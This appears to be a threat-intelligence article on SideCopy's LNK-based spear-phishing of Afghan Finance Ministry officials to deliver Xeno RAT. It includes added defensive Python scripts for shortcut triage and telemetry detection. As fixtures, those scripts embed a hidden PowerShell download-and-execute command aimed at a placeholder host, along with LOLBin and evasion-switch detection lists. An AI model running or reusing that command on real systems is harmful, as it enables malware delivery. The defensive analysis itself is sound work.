Pakistan-attributed threat group SideCopy has launched a targeted spear-phishing campaign against officials at Afghanistan’s Ministry of Finance, delivering malicious LNK shortcut files crafted with Pashto-language filenames to blend with legitimate Afghan government documents and deploy Xeno RAT on victim systems.
SideCopy’s Campaign Against Afghanistan’s Finance Ministry
SideCopy operates under the Transparent Tribe umbrella — a broader Pakistan-attributed threat cluster with a long record of targeting government and defense organizations across South and Central Asia. In this campaign, the group selected the Afghanistan Ministry of Finance as the primary target, consistent with Pakistani state intelligence interests in Afghan government financial operations, including tracking cross-border financial flows and economic policy.
The delivery mechanism is spear-phishing email carrying malicious LNK shortcut files. A shortcut runs whatever command line its target field holds the moment the recipient double-clicks it, with no Office macro involved, so it is untouched by Office's default blocking of macros in documents that carry an internet mark-of-the-web; Windows Explorer also hides the .lnk extension by default, so a file named with a document extension in front of .lnk displays as that document. The files in this campaign were given Pashto-language filenames designed to appear as routine Afghan government documents. That language-specific detail signals pre-attack reconnaissance: the threat actor studied the target environment's document conventions closely enough to replicate them convincingly.
Xeno RAT: Full System Access Through a Single Lure
The payload delivered through the LNK files is Xeno RAT, a full-featured remote access trojan capable of providing complete control over compromised systems. Xeno RAT’s capabilities include file access and exfiltration, keylogging, screenshot capture, process injection, live audio streaming, live video streaming, and credential harvesting.
That capability set gives SideCopy operators persistent, deep access to the compromised official’s workstation — and through it, to whatever internal Ministry of Finance systems and communications that workstation can reach. A Finance Ministry official’s machine is likely to hold budget documents, inter-agency communications, banking system credentials, and correspondence with international financial institutions — precisely the categories of intelligence that would serve Pakistani state intelligence objectives in the current regional environment.
Lure Crafting as an Intelligence Indicator
The use of Pashto-language filenames is not just an operational tradecraft choice — it is a significant intelligence indicator. Creating convincing Pashto-language document lures requires either native-language operators or prior collection sufficient to generate authentic-looking filenames. This level of target-environment knowledge is consistent with SideCopy’s documented approach to pre-attack reconnaissance and distinguishes this campaign from lower-sophistication phishing operations that rely on generic English-language lures.
The decision to use LNK files rather than more common delivery formats also reflects awareness of the target organization's likely defensive posture. Because a shortcut never invokes an Office macro, it produces none of the Office-spawns-child-process telemetry that macro detections key on and is unaffected by macro-blocking policy, which suggests the threat actor anticipated that macro-based lures would be blocked in the target environment. The trade-off for the attacker is that the shortcut leaves its own execution chain behind: explorer.exe launching cmd.exe or powershell.exe with a command line the user never typed.
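The two passages above describe what a malicious shortcut does when opened. The script below, added here as an illustration and not code from the original article, parses the parts of the MS-SHLLINK format needed to recover what a .lnk actually runs (target path, arguments, window state, icon) and applies the checks an analyst would run on a suspected lure: document-extension masquerade, script-host or LOLBin targets, hidden-window and execution-policy switches, embedded URLs, and an icon that does not match the launched binary. Both sample shortcuts are constructed inside the script; their filenames, paths, command line and the 203.0.113.10 address are placeholders, not indicators from the SideCopy campaign.

```python
"""Static triage of a Windows shortcut (.lnk) lure.

Added example, not code from the original article. Parses the MS-SHLLINK header
and StringData needed to recover what a shortcut runs on double-click (target,
arguments, window state, icon) and applies lure heuristics. The sample shortcuts
are constructed here; paths, command line and 203.0.113.10 are placeholders.
"""
import struct

# ShellLinkHeader.LinkFlags bits (MS-SHLLINK 2.1.1) used below.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7   # ShowCommand value lures use to keep the console window off-screen
STRING_FIELDS = [        # StringData fields in the order the format stores them
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")]
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")
LOLBINS = ("cmd.exe", "powershell", "pwsh", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "curl")
EVASION_SWITCHES = ("-enc", "-encodedcommand", "-ep bypass", "-executionpolicy bypass",
                    "-w hidden", "-windowstyle hidden", "-nop", "-noprofile")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk blob."""
    if (len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        info[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return info


def triage_lnk(filename: str, data: bytes) -> list:
    """Apply lure heuristics to a shortcut; returns human-readable findings (empty = clean)."""
    info = parse_lnk(data)
    findings = []
    stem = filename.lower()
    stem = stem[:-4] if stem.endswith(".lnk") else stem
    if stem.endswith(DOC_EXTS):
        findings.append("masquerade: document extension before .lnk (Explorer hides .lnk)")
    launched = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    hits = [b for b in LOLBINS if b in launched]
    if hits:
        findings.append("launches script host / LOLBin: " + ", ".join(hits))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window suppressed: ShowCommand=SW_SHOWMINNOACTIVE")
    switches = [s for s in EVASION_SWITCHES if s in launched]
    if switches:
        findings.append("evasion switches: " + ", ".join(switches))
    if "http://" in launched or "https://" in launched:
        findings.append("remote payload fetch in command line")
    icon = info.get("icon_location", "").lower()
    if hits and icon and not icon.endswith(("cmd.exe", "powershell.exe", "pwsh.exe")):
        findings.append("icon mismatch: " + icon + " does not match the launched binary")
    return findings


def build_lnk(flags: int, show_cmd: int, **strings) -> bytes:
    """Serialise a minimal .lnk (header, UTF-16 StringData, TerminalBlock). Fixture only."""
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    body = b""
    for bit, name in STRING_FIELDS:
        if flags & bit:
            body += struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
    return header + body + struct.pack("<I", 0)   # zero-size TerminalBlock ends ExtraData


# Constructed lure: displays as a PDF, silently runs cmd -> hidden PowerShell downloader.
LURE_ARGS = ('/c powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/u -OutFile '
             '$env:APPDATA\\svchost.exe; Start-Process $env:APPDATA\\svchost.exe"')
LURE_LNK = build_lnk(HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION
                     | IS_UNICODE, SW_SHOWMINNOACTIVE,
                     relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
                     working_dir="C:\\Windows\\System32", arguments=LURE_ARGS,
                     icon_location="%SystemRoot%\\System32\\shell32.dll")
# Constructed benign shortcut for comparison.
BENIGN_LNK = build_lnk(HAS_RELATIVE_PATH | HAS_ICON_LOCATION | IS_UNICODE, 1,
                       relative_path="..\\..\\..\\Windows\\System32\\notepad.exe",
                       icon_location="C:\\Windows\\System32\\notepad.exe")

if __name__ == "__main__":
    for name, blob in (("budget_report.pdf.lnk", LURE_LNK), ("notes.lnk", BENIGN_LNK)):
        print(name, triage_lnk(name, blob) or ["no findings"])
```

Run it on a real sample with `triage_lnk(path.name, open(path, "rb").read())`. The parser deliberately skips the LinkTargetIDList and LinkInfo structures rather than decoding them; for a lure the relative path and arguments carry the command that matters, and a shortcut whose flags claim an IDList but whose StringData is missing is itself worth a second look.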
SideCopy’s 2026 Operational Pattern
SideCopy’s targeting of Afghanistan’s Finance Ministry fits the group’s 2026 operational pattern, which has also included attacks against Indian defense and technology organizations. The combination of targets, Indian defense and technology on one axis and Afghan government finance on another, illustrates the group’s reach across South and Central Asian government institutions and its alignment with the collection priorities that Pakistani state actors have historically pursued in the region.
Attribution to SideCopy is assessed with high confidence on the basis of overlap in tradecraft and infrastructure with known SideCopy activity. The group’s characteristic LNK-based delivery, language-tailored lures, and RAT-based post-exploitation align closely with the technical profile established across earlier SideCopy campaigns. The payload itself carries less attributive weight: Xeno RAT is a publicly available open-source tool, so its presence alone does not distinguish SideCopy from any other actor that has downloaded it.
Detecting SideCopy Post-Execution in Afghan Government Environments
Government networks in South and Central Asia operating in threat environments where SideCopy is active face a specific challenge: the group’s lures are designed to be indistinguishable from legitimate documents within the target organization’s own workflow. Standard user awareness training centered on spotting “suspicious” attachments is less effective when the attachment appears exactly as expected. Detection focus should therefore fall on post-execution behavior rather than on file-type or filename inspection at the perimeter: the process chain a shortcut leaves when opened (explorer.exe spawning cmd.exe or powershell.exe with hidden-window or encoded-command switches), remote-thread or other injection activity originating from binaries that run out of user-writable directories, and outbound connections from those binaries that recur on a fixed interval.
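The post-execution signals listed above can be expressed as simple rules over endpoint telemetry. The script below is an added example, not part of the original article and not a vendor rule set; it assumes Sysmon-style events (ID 1 process creation, ID 3 network connection, ID 8 CreateRemoteThread) flattened to JSON lines with the field names used in the code, and runs three detections over them: an Explorer-spawned script host with lure-like arguments, a remote thread created by a binary in a user-writable path, and per-destination connection timing regular enough to be a beacon, alongside any outbound traffic from a user-writable path. The events are constructed inline; the user name, paths and the 203.0.113.10 and 198.51.100.7 addresses are placeholders, not campaign indicators.

```python
"""Post-execution detection of an LNK-to-RAT intrusion over process and network telemetry.

Added example, not from the original article or any vendor rule set. Assumes Sysmon-style
events flattened to JSON lines with the fields used below (eid, ts, image, parent_image,
command_line, dest_ip, dest_port, source_image, target_image). Events are constructed
here; names, paths and the 203.0.113.10 / 198.51.100.7 addresses are placeholders.
"""
import json
import statistics
from collections import defaultdict
from datetime import datetime

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Command-line fragments that point to a lure rather than an admin at a console.
SUSPICIOUS_CL = ("-enc", "-ep bypass", "-executionpolicy bypass", "-w hidden",
                 "-windowstyle hidden", "-nop", "powershell", "mshta", "http://", "https://")
# Directories a standard user can write to; services rarely run from them legitimately.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\", "\\programdata\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def user_writable(path: str) -> bool:
    return any(m in path.lower() for m in USER_WRITABLE)


def detect_lnk_launch(ev: dict):
    """EID 1: explorer.exe (the double-click) spawning a script host with lure-like arguments."""
    if ev.get("eid") != 1 or basename(ev.get("parent_image", "")) != "explorer.exe":
        return None
    if basename(ev.get("image", "")) not in SCRIPT_HOSTS:
        return None
    cl = ev.get("command_line", "").lower()
    if any(s in cl for s in SUSPICIOUS_CL):
        return {"rule": "lnk_style_launch", "detail": ev["command_line"]}
    return None


def detect_remote_thread(ev: dict):
    """EID 8: CreateRemoteThread issued by a binary living in a user-writable directory."""
    if ev.get("eid") == 8 and user_writable(ev.get("source_image", "")):
        return {"rule": "remote_thread_from_user_path",
                "detail": ev["source_image"] + " -> " + ev["target_image"]}
    return None


def detect_network(events, min_conns=5, max_cv=0.2):
    """EID 3: per (process, destination), flag binaries running from user-writable paths and
    connection timing regular enough to be a beacon (coefficient of variation <= max_cv)."""
    by_dest = defaultdict(list)
    for ev in events:
        if ev.get("eid") == 3:
            key = (ev["image"], ev["dest_ip"], ev["dest_port"])
            by_dest[key].append(datetime.fromisoformat(ev["ts"]))
    alerts = []
    for (image, ip, port), times in by_dest.items():
        dest = f"{basename(image)} -> {ip}:{port}"
        if user_writable(image):
            alerts.append({"rule": "outbound_from_user_path", "detail": dest})
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            alerts.append({"rule": "periodic_beacon",
                           "detail": f"{dest} every ~{mean:.0f}s over {len(times)} connections"})
    return alerts


def run_detections(jsonl: str) -> list:
    """Run all rules over a JSON-lines telemetry dump and return alerts in order."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    alerts = []
    for ev in events:
        for rule in (detect_lnk_launch, detect_remote_thread):
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts + detect_network(events)


# Constructed telemetry: lure launch, benign Word launch, RAT beaconing from AppData every
# ~60 s, a browser with irregular traffic, and one remote-thread injection into Explorer.
SAMPLE_EVENTS = r"""
{"eid":1,"ts":"2026-03-02T09:58:12","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c powershell -w hidden -ep bypass -c \"iwr http://203.0.113.10/u -OutFile $env:APPDATA\\svchost.exe; Start-Process $env:APPDATA\\svchost.exe\""}
{"eid":1,"ts":"2026-03-02T09:58:40","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","command_line":"\"WINWORD.EXE\" /n \"C:\\Users\\ahmad\\Documents\\budget.docx\""}
{"eid":3,"ts":"2026-03-02T10:00:00","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:01:00","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:02:01","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:02:59","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:04:00","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:05:01","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:06:00","image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","dest_ip":"203.0.113.10","dest_port":8443}
{"eid":3,"ts":"2026-03-02T10:00:05","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_ip":"198.51.100.7","dest_port":443}
{"eid":3,"ts":"2026-03-02T10:00:08","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_ip":"198.51.100.7","dest_port":443}
{"eid":3,"ts":"2026-03-02T10:00:53","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_ip":"198.51.100.7","dest_port":443}
{"eid":3,"ts":"2026-03-02T10:00:55","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_ip":"198.51.100.7","dest_port":443}
{"eid":3,"ts":"2026-03-02T10:03:05","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_ip":"198.51.100.7","dest_port":443}
{"eid":8,"ts":"2026-03-02T10:00:30","source_image":"C:\\Users\\ahmad\\AppData\\Roaming\\svchost.exe","target_image":"C:\\Windows\\explorer.exe"}
"""

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert["rule"], "|", alert["detail"])
```

The beacon rule keys on timing regularity rather than on the destination address, which is the point: SideCopy can rotate infrastructure, but a RAT that checks in on a fixed schedule from a binary that should never make outbound connections looks the same on the wire regardless of where it connects. Tune `min_conns` and `max_cv` against the organization's own baseline before alerting on them, since some legitimate agents also poll on a fixed interval; the user-writable-path condition is what separates those from a dropped payload.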